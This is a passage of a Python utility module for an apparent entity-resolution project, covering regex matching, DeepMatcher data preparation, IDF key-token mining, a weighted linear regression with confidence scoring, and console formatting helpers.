type(string) != str:\r\n return False\r\n result = False\r\n if matchway == runtime.regularpattern.matchway.groups:\r\n for eachgroupindex in range(0, len(pattern)):\r\n currentresult = runtime.regularpattern.ispattern(string, pattern[eachgroupindex][0], pattern[eachgroupindex][1], bool)\r\n if currentresult != False and \\\r\n (len(pattern[eachgroupindex]) <= 2 or \\\r\n len(pattern[eachgroupindex]) >= 3 and pattern[eachgroupindex][2](string) == True):\r\n result = str(eachgroupindex)\r\n break\r\n elif matchway == runtime.regularpattern.matchway.ner:\r\n ners = runtime.regularpattern.nlp(string, disable=['tagger', 'parser'])\r\n ents = ners.ents\r\n if len(ents) == 0:\r\n return False\r\n else:\r\n assert(len(ents) == 1)\r\n for ent in ents:\r\n start, end, label = ent.start, ent.end, ent.label_\r\n if label in pattern:\r\n return True\r\n else:\r\n return False\r\n elif matchway == runtime.regularpattern.matchway.idf:\r\n return True\r\n else:\r\n if matchway == runtime.regularpattern.matchway.contain:\r\n contains = re.findall(pattern, string)\r\n if len(contains) > 0:\r\n result = contains\r\n else:\r\n result = False\r\n elif matchway == runtime.regularpattern.matchway.exact:\r\n if pattern[0] != '^':\r\n pattern = '^' + pattern\r\n if pattern[-1] != '$':\r\n pattern = pattern + '$'\r\n thestring = re.search(pattern, string)\r\n if thestring != None and thestring.string == string:\r\n result = True\r\n else:\r\n result = False\r\n elif matchway == runtime.regularpattern.matchway.startwith:\r\n if pattern[0] != '^':\r\n pattern = '^' + pattern\r\n if pattern[-1] == '$':\r\n pattern = pattern[0:len(pattern) - 1]\r\n pattern = re.compile(pattern)\r\n startwith = pattern.match(string)\r\n if startwith:\r\n result = startwith.group()\r\n else:\r\n result = False\r\n if bool == True:\r\n return result != False\r\n else:\r\n return result\r\n\r\n class deepmatcherlinkage:\r\n\r\n @staticmethod\r\n def combine(table1filename, table2filename, pairsfilename, dmpairsfilename):\r\n csvpairsfile = open(pairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n hpairs = next(readerpairs)\r\n csvtable1file = open(table1filename, \"r\", encoding='ISO-8859-1')\r\n readertable1 = csv.reader(csvtable1file)\r\n htable1 = next(readertable1)\r\n csvtable2file = open(table2filename, \"r\", encoding='ISO-8859-1')\r\n readertable2 = csv.reader(csvtable2file)\r\n htable2 = next(readertable2)\r\n leng = len(htable1) - 1\r\n for i in range(leng):\r\n htable1[i + 1] = 'left_' + htable1[i + 1]\r\n htable2[i + 1] = 'right_' + htable2[i + 1]\r\n df = pd.DataFrame(columns=[\"label\"] + htable1[1:] + htable2[1:])\r\n e1 = []\r\n for item1 in readertable1:\r\n e1.append(item1)\r\n e2 = []\r\n for item2 in readertable2:\r\n e2.append(item2)\r\n progress = 0\r\n for item3 in readerpairs:\r\n data = []\r\n id = item3[0]\r\n label = item3[1]\r\n data.append(label)\r\n id1 = id.split(\",\")[0]\r\n id2 = id.split(\",\")[1]\r\n for item1 in e1:\r\n len1 = len(item1) - 1\r\n if item1[0] == id1:\r\n for i in range(len1):\r\n data.append(item1[i + 1])\r\n break\r\n for item2 in e2:\r\n len2 = len(item2) - 1\r\n if item2[0] == id2:\r\n for i in range(len2):\r\n data.append(item2[i + 1])\r\n break\r\n df.loc[len(df)] = data\r\n csvpairsfile.close()\r\n df.index.name = 'id'\r\n df.to_csv(dmpairsfilename)\r\n\r\n @staticmethod\r\n def division_specifiedtrain(dmpairsfilename, pairsfilename, tabletrainname, trainvalidproportion, outtrainname, outvalidname, outtestname, givenlabel=False):\r\n csvtrainpairsfile = open(tabletrainname, \"r\", encoding='ISO-8859-1')\r\n readertrainpairs = csv.reader(csvtrainpairsfile)\r\n trainset = {}\r\n headtrainpairs = next(readertrainpairs)\r\n for itemtrainpair in readertrainpairs:\r\n csvpairsfile = open(pairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n index = 0\r\n for itempair in readerpairs:\r\n index += 1\r\n if (itempair[0] == itemtrainpair[0]):\r\n trainset[str(index - 2)] = int(itemtrainpair[1])\r\n break\r\n csvpairsfile = open(dmpairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n headpairs = next(readerpairs)\r\n train = pd.DataFrame(columns=headpairs)\r\n test = pd.DataFrame(columns=headpairs)\r\n for itempair in readerpairs:\r\n if itempair[0] in trainset:\r\n if givenlabel == True:\r\n itempair[1] = trainset[itempair[0]]\r\n train.loc[len(train)] = itempair\r\n else:\r\n test.loc[len(test)] = itempair\r\n # N = train.shape[0] - 1\r\n # train_n = int (N * a)\r\n # validation_n = N - train_n\r\n outtrain = train.sample(frac=trainvalidproportion, replace=False, axis=0)\r\n outvalidation = train.drop(labels=outtrain.axes[0])\r\n outtrain.to_csv(outtrainname, index=False)\r\n outvalidation.to_csv(outvalidname, index=False)\r\n test.to_csv(outtestname, index=False)\r\n\r\n class types:\r\n Lock = type(Lock())\r\n NoneType = type(None)\r\n\r\n class key_token_mining:\r\n\r\n KEY_TOKEN_MIN_LENGTH = 3\r\n\r\n def __init__(self, gml):\r\n self.gml = gml\r\n self.run()\r\n\r\n @staticmethod\r\n def tokenize_target_text(text):\r\n \"\"\"\r\n This implementation is consistent with 'basic_feature_analysis.py'\r\n :param text:\r\n :return:\r\n \"\"\"\r\n text = str(text).lower()\r\n if len(text) == 0 or text == 'nan' or text == 'n/a':\r\n return []\r\n tokens = nltk.word_tokenize(text)\r\n result = []\r\n for eachtoken in tokens:\r\n if metainfo.paras.nlpw2vgroups is not None and 'ex' in metainfo.paras.nlpw2vgroups:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern_ex, '', eachtoken)\r\n else:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern, '', eachtoken)\r\n if len(eachtoken) >= runtime.key_token_mining.KEY_TOKEN_MIN_LENGTH:\r\n result.append(eachtoken)\r\n return result\r\n\r\n @staticmethod\r\n def entity_target_text(text):\r\n text = str(text).lower()\r\n if len(text) == 0 or text == 'nan' or text == 'n/a':\r\n return []\r\n result = []\r\n for entity in text:\r\n normalized_entity = ' '.join(runtime.key_token_mining.tokenize_target_text(entity))\r\n result.append(normalized_entity)\r\n return result\r\n\r\n @staticmethod\r\n def process_text(text):\r\n if type(text) == str:\r\n return runtime.key_token_mining.tokenize_target_text(text)\r\n else:\r\n # entity list or set\r\n return runtime.key_token_mining.entity_target_text(text)\r\n\r\n def tokenize_target_attribute(self, target_attribute):\r\n \"\"\"\r\n :param target_attribute: str\r\n :param entity_splitter: If not None, process text to entities.\r\n :return:\r\n \"\"\"\r\n attr_values = []\r\n # data set #1\r\n attr_index1 = self.gml.data1.columns.get_loc(target_attribute)\r\n for eachrecordid in self.gml.records:\r\n recordtext = self.gml.records[eachrecordid]\r\n attr_values.append(runtime.key_token_mining.process_text(recordtext[attr_index1]))\r\n return attr_values\r\n\r\n @staticmethod\r\n def cal_token_idf(attribute_values):\r\n \"\"\"\r\n calculate Inverse document frequency.\r\n ref: https://en.wikipedia.org/wiki/Tf-idf\r\n :param attribute_values: [[...], ...]\r\n :return:\r\n \"\"\"\r\n token_2_idf = dict()\r\n token_2_freq = dict()\r\n if attribute_values is None:\r\n return token_2_idf\r\n token_2_docs = dict()\r\n docs_len = len(attribute_values)\r\n for i in range(docs_len):\r\n values = set(attribute_values[i])\r\n for token in values:\r\n token_2_docs.setdefault(token, set())\r\n token_2_docs[token].add(i)\r\n for eachtoken, v in token_2_docs.items():\r\n inv_doc_fre = len(token_2_docs.get(eachtoken)) + 1.0\r\n idf = np.log(1.0 * docs_len / inv_doc_fre)\r\n token_2_idf[eachtoken] = idf\r\n freq = len(token_2_docs.get(eachtoken))\r\n token_2_freq[eachtoken] = freq\r\n return token_2_idf, token_2_freq\r\n\r\n def mining_key_tokens(self, target_attribute_index):\r\n \"\"\"\r\n Select tokens with high IDF values.\r\n :param target_attribute:\r\n :param top_percent:\r\n :param qualified_threshold: Tokens that appear less than qualified_threshold will be selected.\r\n :return:\r\n \"\"\"\r\n target_attribute = self.gml.RecordAttributes[target_attribute_index]\r\n bottom_percent = 0\r\n low_qualified_threshold = 1\r\n top_percent = self.gml.data.infer_keytoken.idfrange\r\n qualified_threshold = self.gml.data.infer_keytoken.freqrange\r\n pattern_specified = runtime.regularpattern.index(self.gml.data.infer_keytoken.patternrestrict)\r\n if type(top_percent) == list:\r\n top_percent = top_percent[target_attribute_index]\r\n if type(top_percent) == list:\r\n bottom_percent = top_percent[0]\r\n top_percent = top_percent[1]\r\n if type(qualified_threshold) == list:\r\n qualified_threshold = qualified_threshold[target_attribute_index]\r\n if type(qualified_threshold) == list:\r\n low_qualified_threshold = qualified_threshold[0]\r\n qualified_threshold = qualified_threshold[1]\r\n column_name = '{} ~ {}, {} ~ {}, {}, {}'.format(bottom_percent, top_percent, low_qualified_threshold, qualified_threshold, self.gml.data.infer_keytoken.patternrestrict, self.gml.data.infer_keytoken.nlpw2vgroups)\r\n key_token_path = self.gml.processpath + \"infer_keytoken_\" + target_attribute + \".csv\"\r\n if os.path.exists(key_token_path) == False and (top_percent == 0 and qualified_threshold == 0):\r\n return []\r\n elif os.path.exists(key_token_path):\r\n # Still preprocesscached_keytokens when (top_percent > 0 or qualified_threshold > 0) but pattern != None makes an empty keytoken csv cached.\r\n kt_pd = pd.read_csv(key_token_path, dtype=str, encoding=\"utf-8\")\r\n if column_name == kt_pd.columns.tolist()[0]:\r\n key_tokens = list(kt_pd.values.reshape(-1))\r\n return key_tokens\r\n self.gml.preprocesscached_keytokens = False\r\n key_tokens = []\r\n if top_percent > 0 or qualified_threshold > 0:\r\n print(\"idf percent: {} ~ {}\".format(bottom_percent, top_percent))\r\n print(\"qualified threshold: {} ~ {}\".format(low_qualified_threshold, qualified_threshold))\r\n print(\"patternrestrict: {}: {}\".format(self.gml.data.infer_keytoken.patternrestrict, pattern_specified))\r\n print(\"nlpw2vgroups: {}\".format(self.gml.data.infer_keytoken.nlpw2vgroups))\r\n attr_2_tokens = self.tokenize_target_attribute(target_attribute)\r\n token_2_idf_values, token_2_freq_values = runtime.key_token_mining.cal_token_idf(attr_2_tokens)\r\n all_tokens_num = len(token_2_idf_values)\r\n bottom_percent_conform_countindex = np.maximum(int(bottom_percent * all_tokens_num), 1)\r\n top_percent_conform_countindex = np.maximum(int(top_percent * all_tokens_num), 1)\r\n idf_descending = sorted(token_2_idf_values.items(), key=lambda item: item[1], reverse=True)\r\n selected_number = 0\r\n selected_index = 0\r\n first_index = None\r\n last_index = None\r\n first_value = idf_descending[bottom_percent_conform_countindex - 1][1]\r\n last_value = idf_descending[top_percent_conform_countindex - 1][1]\r\n first_freq = token_2_freq_values[idf_descending[bottom_percent_conform_countindex - 1][0]]\r\n last_freq = token_2_freq_values[idf_descending[top_percent_conform_countindex - 1][0]]\r\n # Minimum IDF value.\r\n max_threshold = np.log(1.0 * len(attr_2_tokens) / (low_qualified_threshold + 1))\r\n min_threshold = np.log(1.0 * len(attr_2_tokens) / (qualified_threshold + 1))\r\n while selected_index < all_tokens_num:\r\n if top_percent > 0 and (first_value >= idf_descending[selected_index][1] and last_value <= idf_descending[selected_index][1]) or (max_threshold >= idf_descending[selected_index][1] and min_threshold <= idf_descending[selected_index][1]):\r\n if first_index == None:\r\n first_index = selected_index\r\n last_index = selected_index\r\n key_tokens.append(idf_descending[selected_index][0])\r\n selected_number += 1\r\n selected_index += 1\r\n if runtime.isNone(self.gml.data.infer_keytoken.nlpw2vgroups) == False and 'sparse' in self.gml.data.infer_keytoken.nlpw2vgroups and pattern_specified != None:\r\n for each_key_token in list(key_tokens):\r\n if runtime.regularpattern.ispattern(each_key_token, pattern_specified[0], pattern_specified[1], True) == False:\r\n key_tokens.remove(each_key_token)\r\n if metainfo.runningflags.refresh_cache == True:\r\n kt_pd = pd.DataFrame(key_tokens, columns=[column_name])\r\n kt_pd.to_csv(key_token_path, index=False, encoding=\"utf-8\")\r\n print(\"# of key tokens: {} / {}, saving file path: {}\".format(len(key_tokens), all_tokens_num, key_token_path))\r\n print(\"idf indexes from {} to {}\".format(first_index, last_index))\r\n print(\"idf qualified threshold from {} to {}\".format(first_freq, last_freq))\r\n print(\"patternrestrict: {}: {}\".format(self.gml.data.infer_keytoken.patternrestrict, pattern_specified))\r\n print(\"nlpw2vgroups: {}\".format(self.gml.data.infer_keytoken.nlpw2vgroups))\r\n return key_tokens\r\n\r\n def run(self):\r\n break_point = sys.stdout\r\n buffering_size = 1 # line buffering (ref: https://docs.python.org/3/library/functions.html#open)\r\n out_file = None\r\n if metainfo.runningflags.refresh_cache == True:\r\n out_file = open(self.gml.processpath + \"infer_keytoken.txt\", 'w', buffering_size, encoding='utf-8')\r\n else:\r\n out_file = open(self.gml.processpath + \"infer_keytoken.txt\", 'a+', buffering_size, encoding='utf-8')\r\n sys.stdout = out_file\r\n print(\"\\n\")\r\n time_info = '-' * 20 + str(datetime.datetime.fromtimestamp(time.time())) + '-' * 20\r\n print(time_info)\r\n out_file.flush()\r\n for target_attribute_index in range(1, len(self.gml.RecordAttributes)):\r\n print(\"\\n\")\r\n key_tokens = self.mining_key_tokens(target_attribute_index)\r\n self.gml.infer_keytoken[target_attribute_index] = key_tokens\r\n print(\"# of key tokens: {}\".format(len(key_tokens)))\r\n print(type(key_tokens))\r\n print(key_tokens[:10])\r\n print(\"\\n\")\r\n out_file.flush()\r\n print('-' * len(time_info))\r\n print(\"\\n\")\r\n out_file.flush()\r\n out_file.close()\r\n sys.stdout = break_point\r\n\r\n @staticmethod\r\n def process(string1, tostring = False):\r\n\r\n def prepreprocess(string1):\r\n strstring1 = str(string1).lower()\r\n if len(strstring1) == 0 or strstring1 == 'nan' or strstring1 == 'n/a':\r\n return ''\r\n else:\r\n try:\r\n string1 = float(string1)\r\n if string1 == round(string1):\r\n string1 = int(string1)\r\n else:\r\n string1 = runtime.round(string1)\r\n return string1\r\n except:\r\n return strstring1\r\n\r\n def preprocess(string1):\r\n if isinstance(string1, str):\r\n string1tokens = nltk.word_tokenize(string1)\r\n string1 = ''\r\n for eachtoken in string1tokens:\r\n if metainfo.paras.nlpw2vgroups is not None and 'ex' in metainfo.paras.nlpw2vgroups:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern_ex, '', eachtoken)\r\n else:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern, '', eachtoken)\r\n if len(eachtoken) > 0:\r\n if len(string1) > 0:\r\n string1 += ' '\r\n string1 += eachtoken\r\n multispacestring1 = str(string1)\r\n string1 = ''\r\n for eachtoken in multispacestring1.split():\r\n if len(string1) > 0:\r\n string1 += ' '\r\n string1 += eachtoken\r\n abbrstring1 = ''\r\n if len(string1) > 0:\r\n string1tokens = string1.split(' ')\r\n for index in range(0, len(string1tokens)):\r\n current1 = string1tokens[index]\r\n if runtime.regularpattern.ispattern(current1, runtime.regularpattern.numberpattern, runtime.regularpattern.matchway.contain, True):\r\n abbrstring1 += current1\r\n else:\r\n abbrstring1 += current1[0]\r\n return string1, abbrstring1\r\n else:\r\n return string1, string1\r\n\r\n if tostring == True:\r\n return str(preprocess(prepreprocess(string1))[0])\r\n else:\r\n return preprocess(prepreprocess(string1))[0]\r\n\r\n remove_punctuation_map = dict((ord(char), None) for char in string.punctuation)\r\n\r\n @staticmethod\r\n def find_lcsubstr(s1, s2):\r\n s1 = s1.lower()\r\n s2 = s2.lower()\r\n s1s = nltk.word_tokenize(s1.translate(runtime.remove_punctuation_map))\r\n s2s = nltk.word_tokenize(s2.translate(runtime.remove_punctuation_map))\r\n m = [[0 for i in range(len(s2s) + 1)] for j in range(len(s1s) + 1)] # 生成0矩阵,为方便后续计算,比字符串长度多了一列\r\n mmax = 0 # 最长匹配的长度\r\n p = 0 # 最长匹配对应在s1中的最后一位\r\n for i in range(len(s1s)):\r\n for j in range(len(s2s)):\r\n if s1s[i] == s2s[j]:\r\n m[i + 1][j + 1] = m[i][j] + 1\r\n if m[i + 1][j + 1] > mmax:\r\n mmax = m[i + 1][j + 1]\r\n p = i + 1\r\n maxcontinualwords = s1s[p - mmax:p]\r\n maxcontinualtokensrelativelength = float(len(maxcontinualwords)) / max(len(s1s), len(s2s))\r\n return len(maxcontinualwords), maxcontinualtokensrelativelength # 返回最长子串及其长度\r\n\r\n @staticmethod\r\n def round(value):\r\n if type(value) == list or type(value) == np.ndarray:\r\n roundedvalue = []\r\n for index in range(0, len(value)):\r\n roundedvalue.append(runtime.round(value[index]))\r\n return roundedvalue\r\n else:\r\n if value == None or value == metainfo.top.NOT_AVAILABLE:\r\n return metainfo.top.NOT_AVAILABLE\r\n else:\r\n if type(value) == np.float64 or type(value) == np.float32 or type(value) == float:\r\n return round(value, metainfo.paras.rounddigits)\r\n else:\r\n return value\r\n\r\n @staticmethod\r\n def isnumber(x):\r\n if type(x) == np.float64 or type(x) == np.float32 or type(x) == float or type(x) == complex or type(x) == int:\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def enum(**enums):\r\n return type('Enum', (), enums)\r\n\r\n class linearregression:\r\n n_job = 20\r\n delta = None\r\n themetafeature = None\r\n regression = None\r\n residual = None\r\n meanX = None\r\n variance = None\r\n X = None\r\n Y = None\r\n BalanceWeightY0Count = None\r\n BalanceWeightY1Count = None\r\n HardLabelEnhance0 = None\r\n HardLabelEnhance1 = None\r\n N = None\r\n k = None\r\n b = None\r\n monotonyeffective = None\r\n effectivetrainingcount = 2\r\n polarenforce = None\r\n variablebound = None\r\n updatecache = None\r\n regupdatecallback = None\r\n\r\n def voidfunction(self):\r\n pass\r\n\r\n # The Linear Regression doesn't regress on Probability of Unit Aera Spliting,\r\n # instead, it regresses on the maximum weight values of all point instances,\r\n # to avoid a naive residual loss w.r.t samples count and constant-0-weight line indirect.\r\n # The highest confidence value is located in the intuitive average feature value and also the most naive weight value,\r\n # to conservatively avoid any early risk and better to believe those points with intuitive certainty.\r\n\r\n def __init__(self, themetafeature, XY, polarenforce, variablebound, regupdatecallback = None):\r\n self.themetafeature = themetafeature\r\n self.polarenforce = polarenforce\r\n self.variablebound = variablebound\r\n self.regupdatecallback = regupdatecallback\r\n if self.regupdatecallback == None:\r\n self.regupdatecallback = self.voidfunction\r\n self.delta = metainfo.paras.regressiondelta\r\n self.updatecache = 0\r\n self.effectivetrainingcount = runtime.linearregression.effectivetrainingcount\r\n if len(XY) > 0:\r\n XY = np.array(list(XY))\r\n self.X = XY[:, 0].reshape(-1, 1)\r\n self.Y = XY[:, 1].reshape(-1, 1)\r\n else:\r\n self.X = np.array([]).reshape(-1, 1)\r\n self.Y = np.array([]).reshape(-1, 1)\r\n self.BalanceWeightY0Count = 0\r\n self.BalanceWeightY1Count = 0\r\n self.HardLabelEnhance0 = []\r\n self.HardLabelEnhance1 = []\r\n for y in self.Y:\r\n if y > 0:\r\n self.BalanceWeightY1Count += 1\r\n else:\r\n self.BalanceWeightY0Count += 1\r\n self.performregression()\r\n\r\n def append(self, appendx, appendy, hardlabel):\r\n self.X = np.append(self.X, [[appendx]], axis=0)\r\n self.Y = np.append(self.Y, [[appendy]], axis=0)\r\n if appendy >= 0:\r\n self.BalanceWeightY1Count += 1\r\n if hardlabel == True:\r\n self.HardLabelEnhance1.append(appendx)\r\n else:\r\n self.BalanceWeightY0Count += 1\r\n if hardlabel == True:\r\n self.HardLabelEnhance0.append(appendx)\r\n\r\n def disable(self, delx, dely):\r\n for index in range(0, len(self.X)):\r\n if self.X[index][0] == delx and self.Y[index][0] == dely:\r\n self.X = np.delete(self.X, index, axis=0)\r\n self.Y = np.delete(self.Y, index, axis=0)\r\n if dely > 0:\r\n self.BalanceWeightY1Count -= 1\r\n else:\r\n self.BalanceWeightY0Count -= 1\r\n break\r\n self.performregression()\r\n\r\n def monotonycheck(self):\r\n if self.regression == None or self.k < 0:\r\n self.monotonyeffective = False\r\n else:\r\n self.monotonyeffective = True\r\n\r\n def performregression(self):\r\n self.N = np.size(self.X)\r\n if self.themetafeature != metainfo.top.SIFT and self.N <= self.effectivetrainingcount:\r\n self.regression = None\r\n self.residual = None\r\n self.meanX = None\r\n self.variance = None\r\n self.k = None\r\n self.b = None\r\n else:\r\n if self.themetafeature != metainfo.top.SIFT and self.updatecache > 0:\r\n self.updatecache -= 1\r\n else:\r\n SampleWeightlist = []\r\n SampleWeight = None\r\n if len(np.unique(self.X)) == 1 or self.BalanceWeightY1Count == 0 or self.BalanceWeightY0Count == 0:\r\n SampleWeight = 1\r\n else:\r\n SampleWeight = float(self.BalanceWeightY0Count) / self.BalanceWeightY1Count\r\n HardLabelEnhanced0 = list(self.HardLabelEnhance0)\r\n HardLabelEnhanced1 = list(self.HardLabelEnhance1)\r\n for eachindex in range(0, self.N):\r\n eachx = self.X[eachindex][0]\r\n eachy = self.Y[eachindex][0]\r\n if eachy >= 0:\r\n if eachx in HardLabelEnhanced1:\r\n SampleWeightlist.append(math.pow(metainfo.paras.hard_label_learn_enhance_multiplier, metainfo.paras.hard_label_learn_enhance_multiplier_coefficient) * math.pow(SampleWeight, metainfo.paras.class_weight_multiplier_coefficient))\r\n HardLabelEnhanced1.remove(eachx)\r\n else:\r\n SampleWeightlist.append(SampleWeight)\r\n else:\r\n if eachx in HardLabelEnhanced0:\r\n SampleWeightlist.append(math.pow(metainfo.paras.hard_label_learn_enhance_multiplier, metainfo.paras.hard_label_learn_enhance_multiplier_coefficient) * math.pow(1, metainfo.paras.class_weight_multiplier_coefficient))\r\n HardLabelEnhanced0.remove(eachx)\r\n else:\r\n SampleWeightlist.append(1)\r\n assert(len(HardLabelEnhanced0) == 0 and len(HardLabelEnhanced1) == 0)\r\n self.regression = LinearRegression(copy_X=True, fit_intercept=True, n_jobs=runtime.linearregression.n_job).fit(self.X, self.Y, sample_weight=SampleWeightlist)\r\n self.residual = np.sum((self.regression.predict(self.X) - self.Y) ** 2) / (self.N - 2)\r\n self.meanX = np.mean(self.X)\r\n self.variance = np.sum((self.X - self.meanX) ** 2)\r\n self.k = self.regression.coef_[0][0]\r\n self.b = self.regression.intercept_[0]\r\n self.monotonycheck()\r\n self.updatecache = min(metainfo.paras.updatecache_abscapacity, int(metainfo.paras.updatecache_proportion * self.N))\r\n self.regupdatecallback()\r\n\r\n def predictconfidence(self, x0):\r\n evidentialsupport = None\r\n espredict = None\r\n if self.regression != None and self.monotonyeffective == True:\r\n predict = self.regression.predict(np.array([x0]).reshape(-1, 1))[0][0]\r\n confidence = 1\r\n if self.residual > 0 and self.variance > 0:\r\n tvalue = float(self.delta) / (self.residual * math.sqrt(1 + float(1) / self.N + math.pow(x0 - self.meanX, 2) / self.variance))\r\n confidence = 1 - t.sf(tvalue, (self.N - 2)) * 2\r\n evidentialsupport = (1 + confidence)/2\r\n espredict = predict * evidentialsupport\r\n if self.polarenforce == 0:\r\n espredict = min(espredict, 0)\r\n else:\r\n if self.polarenforce == 1:\r\n espredict = max(espredict, 0)\r\n else:\r\n confidence = 0\r\n evidentialsupport = (1 + confidence) / 2\r\n espredict = 0\r\n return evidentialsupport, espredict\r\n\r\n @staticmethod\r\n def consoleprogress(i, n, info):\r\n len_bar = 100\r\n if n == 0:\r\n return\r\n unit = int(n / 100)\r\n if unit == 0:\r\n unit = 1\r\n if i % unit == 0 or i == n:\r\n i = int(float(i) / n * 100)\r\n format_percent = None\r\n format_bar = None\r\n if i < 10:\r\n format_percent = \"\\r%d%% \"\r\n elif i < 100:\r\n format_percent = \"\\r%d%% \"\r\n else:\r\n format_percent = \"\\r%d%%\"\r\n format_bar = \"%s%s%s%s%s%s\"\r\n show_percent = format_percent % (i)\r\n len_blank = int((len_bar - len(info)) / 2)\r\n left_blank_process_pos = 0\r\n info_process_pos = 0\r\n right_blank_process_pos = 0\r\n if i <= len_blank:\r\n left_blank_process_pos = i\r\n elif i <= len_blank + len(info):\r\n left_blank_process_pos = len_blank\r\n info_process_pos = i - len_blank\r\n else:\r\n left_blank_process_pos = len_blank\r\n info_process_pos = len_blank + len(info)\r\n right_blank_process_pos = i - (len_blank + len(info))\r\n show_bar = format_bar % (runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + \" \" * left_blank_process_pos,\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + \" \" * (len_blank - left_blank_process_pos),\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + info[0:info_process_pos],\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + info[info_process_pos:len(info)],\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + \" \" * right_blank_process_pos,\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + \" \" * (len_blank - right_blank_process_pos))\r\n show = show_percent + '[' + show_bar + runtime.console.color.END + ']'\r\n sys.stdout.write(show)\r\n sys.stdout.flush()\r\n if i == 100:\r\n print()\r\n\r\n @staticmethod\r\n def pickledump(gml, structurename, flag):\r\n picklefile = gml.processpath + structurename + '.pkl'\r\n if flag == 'w':\r\n structure = eval('gml.' + structurename)\r\n output = open(picklefile, 'wb')\r\n pickle.dump(structure, output)\r\n else:\r\n if flag == 'r':\r\n output = open(picklefile, 'rb')\r\n exec('gml.' + structurename + ' = pickle.load(output)')\r\n else:\r\n if flag == 'e':\r\n return os.path.exists(picklefile)\r\n\r\n class console:\r\n\r\n class color:\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n BACKGROUND = '\\033[7m'\r\n RED = '\\033[91m'\r\n GREEN = '\\033[92m'\r\n YELLOW = '\\033[93m'\r\n BLUE = '\\033[94m'\r\n PURPLE = '\\033[95m'\r\n CYAN = '\\033[96m'\r\n BLACK = '\\033[30m'\r\n DARKRED = '\\033[31m'\r\n DARKGREEN = '\\033[32m'\r\n DARKYELLOW = '\\033[33m'\r\n DARKBLUE = '\\033[34m'\r\n DARKPURPLE = '\\033[35m'\r\n DARKCYAN = '\\033[36m'\r\n END = '\\033[0m'\r\n COLORS = [RED, GREEN, YELLOW, BLUE, PURPLE, CYAN, BLACK, DARKRED, DARKGREEN, DARKYELLOW, DARKBLUE, DARKPURPLE, DARKCYAN]\r\n\r\n class styles(Flag):\r\n TOP = auto()\r\n INFO = auto()\r\n STRESS = auto()\r\n OUTLOOK = auto()\r\n REPORT = auto()\r\n CORRECTION = auto()\r\n EXCEPTION = auto()\r\n SIMPLE_CORRECTION = auto()\r\n SIMPLE_EXCEPTION = auto()\r\n PERIOD = auto()\r\n\r\n def __init__(self, title, content, style):\r\n exceptionframe = sys._getframe(1)\r\n functionname = exceptionframe.f_code.co_name\r\n functionlineno = exceptionframe.f_lineno\r\n header1 = None\r\n header2 = None\r\n header3 = None\r\n if style == runtime.console.styles.TOP:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.BOLD + runtime.console.color.RED\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BOLD + runtime.console.color.DARKPURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BOLD + runtime.console.color.PURPLE\r\n elif style == runtime.console.styles.INFO:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.STRESS:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.PURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.OUTLOOK:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.REPORT:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLUE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.CORRECTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3 = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n elif style == runtime.console.styles.EXCEPTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.RED\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3 = runtime.console.color.END + runtime.console.color.DARKRED\r\n elif style == runtime.console.styles.SIMPLE_CORRECTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLACK\r\n header3 = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n elif style == runtime.console.styles.SIMPLE_EXCEPTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLACK\r\n header3 = runtime.console.color.END + runtime.console.color.DARKRED\r\n elif style == runtime.console.styles.PERIOD:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3 = runtime.console.color.END + 